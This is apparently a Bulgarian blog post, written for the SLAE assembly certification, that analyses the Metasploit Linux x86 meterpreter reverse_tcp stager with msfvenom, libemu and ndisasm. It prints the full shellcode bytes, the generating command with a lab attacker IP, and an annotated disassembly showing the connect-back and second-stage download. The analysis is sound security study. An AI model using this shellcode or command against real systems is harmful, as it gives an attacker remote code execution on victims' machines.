В тази публикация ще анализираме linux/meterpreter/reverse_tcp с libemu.
Опции за полезен товар
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp --payload-options
Options for payload/linux/x86/meterpreter/reverse_tcp:
Name: Linux Mettle x86, Reverse TCP Stager
Module: payload/linux/x86/meterpreter/reverse_tcp
Platform: Linux, Linux
Arch: x86
Needs Admin: No
Total size: 245
Rank: Normal
Provided by:
William Webb <[email protected]>
skape <[email protected]>
egypt <[email protected]>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Inject the mettle server payload (staged). Connect back to the
attacker
Генериране на C shellcode
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.1.1 LPORT=4444 -f c No platform was selected, choosing Msf::Module::Platform::Linux from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 123 bytes Final size of c file: 543 bytes unsigned char buf[] = "\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89" "\xe1\xcd\x80\x97\x5b\x68\x0a\x0b\x01\x01\x68\x02\x00\x11\x5c" "\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0" "\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58\x6a\x00\x6a\x05" "\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd\xeb\x27\xb2\x07\xb9" "\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd" "\x80\x85\xc0\x78\x10\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80" "\x85\xc0\x78\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00" "\x00\xcd\x80";
Shellcode за анализ на Libemu
root@kali:/usr/bin# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.1.1 LPORT=4444 -f raw | ./sctest -vvv -Ss 10000
verbose = 3
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
<code snippet>
int socket (
int domain = 2;
int type = 1;
int protocol = 0;
) = 14;
int connect (
int sockfd = 14;
struct sockaddr_in * serv_addr = 0x00416fbe =>
struct = {
short sin_family = 2;
unsigned short sin_port = 23569 (port=4444);
struct in_addr sin_addr = {
unsigned long s_addr = 16845578 (host=10.11.1.1);
};
char sin_zero = " ";
};
int addrlen = 102;
) = 0;
Горният код основно създава сокет и се свързва към 10.11.1.1 на порт 4444. Това е точно като нашите първи две задачи.
Ndisasm прехвърля C shellcode в код за сглобяване.
root@kali:~# echo -ne "\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80\x97\x5b\x68\x0a\x0b\x01\x01\x68\x02\x00\x11\x5c\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0\x79\x19\x4e\x74\x3d\x68\xa2\x00\x00\x00\x58\x6a\x00\x6a\x05\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd\xeb\x27\xb2\x07\xb9\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x85\xc0\x78\x10\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\x85\xc0\x78\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80" | ndisasm -u - 00000000 6A0A push byte +0xa 00000002 5E pop esi ;push 0xa into esi 00000003 31DB xor ebx,ebx ;zero out ebx 00000005 F7E3 mul ebx ;ebx*eax = eax = 0 00000007 53 push ebx ;Push 0 into stack 00000008 43 inc ebx ;ebx = 1 00000009 53 push ebx ;Push 1 into stack 0000000A 6A02 push byte +0x2 ;Push 2 into stack 0000000C B066 mov al,0x66 ;socketcall into eax 0000000E 89E1 mov ecx,esp ;ecx point to 2,1,0 on stack 00000010 CD80 int 0x80 ;call sys_socket 00000012 97 xchg eax,edi 00000013 5B pop ebx ; ebx=2 00000014 680A0B0101 push dword 0x1010b0a ;IP 00000019 680200115C push dword 0x5c110002 ;PORT 0000001E 89E1 mov ecx,esp ;ecx point to IP,PORT on stack 00000020 6A66 push byte +0x66 00000022 58 pop eax ;socketcall into eax 00000023 50 push eax ;push socketcall 00000024 51 push ecx ;push sockaddr 00000025 57 push edi ;socketfd 00000026 89E1 mov ecx,esp ;ecx point to socketcall, addr, socketfd 00000028 43 inc ebx ;ebx=3 00000029 CD80 int 0x80 ;exec sys_connect 0000002B 85C0 test eax,eax 0000002D 7919 jns 0x48 ;jump to mprotect if SF=0 0000002F 4E dec esi 00000030 743D jz 0x6f ;jump to sys_exit if ZF=0 00000032 68A2000000 push dword 0xa2 00000037 58 pop eax ;eax= 0xa2 (sys_nanosleep) 00000038 6A00 push byte +0x0 0000003A 6A05 push byte +0x5 0000003C 89E3 mov ebx,esp 0000003E 31C9 xor ecx,ecx 00000040 CD80 int 0x80 ;syscall nanosleep 00000042 85C0 test eax,eax 00000044 79BD jns 0x3 ;jump if SF=0 00000046 EB27 jmp short 0x6f ;jump to sys_exit 00000048 B207 mov dl,0x7 0000004A B900100000 mov ecx,0x1000 0000004F 89E3 mov ebx,esp 00000051 C1EB0C shr ebx,byte 0xc 00000054 C1E30C shl ebx,byte 0xc 00000057 B07D mov al,0x7d ;eax=sys_mprotect 00000059 CD80 int 0x80 ;exec sys_mprotect 0000005B 85C0 test eax,eax 0000005D 7810 js 0x6f ;jump to sys_exit if SF=1 0000005F 5B pop ebx 00000060 89E1 mov ecx,esp 00000062 99 cdq 00000063 B60C mov dh,0xc ;edx=0xc 00000065 B003 mov al,0x3 ;eax=0x3(sys_read) 00000067 CD80 int 0x80 ;exec sys_read 00000069 85C0 test eax,eax 0000006B 7802 js 0x6f ;jump to sys_exit if SF=1 0000006D FFE1 jmp ecx 0000006F B801000000 mov eax,0x1 ;eax=0x1(sys_exit) 00000074 BB01000000 mov ebx,0x1 ;ebx=0x1 00000079 CD80 int 0x80 ;exec sys_exit root@kali:~#
Този шелкод започва със създаване на сокет и обратно свързване към атакуващата машина. След това има някакъв манипулатор на грешки за обработка на грешки. Ако не възникне грешка, инструкция jns 0x48 ще премине към mov dl,0x7. Тази част от инструкциите ще настрои и изпълни sys_mprotect. Следващата част от инструкциите чете 0xC00 байта от машината на нападателя. В крайна сметка sys_exit syscall се използва за грациозно излизане от програмата.
Тази публикация в блога е създадена за изпълнение на изискванията на сертифицирането SecurityTube Linux Assembly Expert:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/< br /> ID на студент: SLAE-1414
